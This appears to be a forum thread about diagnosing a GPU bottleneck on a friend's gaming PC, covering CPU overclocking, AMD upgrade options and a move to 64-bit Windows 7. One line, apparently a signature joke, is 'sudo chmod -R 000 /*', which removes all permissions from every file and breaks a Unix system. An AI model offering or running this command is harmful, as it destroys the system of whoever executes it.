If you mean overclock the gpu, no, sub-100% usage indicates a bottleneck somewhere else. The culprit is probably the cpu, it's not very powerful in single core performance. To solve the issue you can try overclocking the cpu, or upgrading to a new one (I suggest the 6300 with overclock or the 6350). Try overclocking first, if nothing changes the problem must be elsewhere.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

That is a problem by itself, but it shouldn't be causing such a massive bottleneck in games. You can try installing windows 64-bit if you have it (in fact you should anyway), but I doubt it will make a big difference. Have you tried overclocking the cpu?

I did install win 7 64 bit and ran watch dogs the gpu ran at 95%~97% there is no bottleneck right!!??

P.S. I left the cpu as it's and didn't overclock it -_-

Wel, much better already :) if there is a bottleneck it's minimal, you can sleep sound. I'd still oc a bit, but hey, it's your choice.

if you are playing an mmo, or certain online titles, gpu not running at full can be normal.

Would you over clock an amd cpu with it's stock cooler :D anyway it's not my rig so I'm going to tell my friend if he could buy a custom cooler and overclock but I really doubt he will -_-
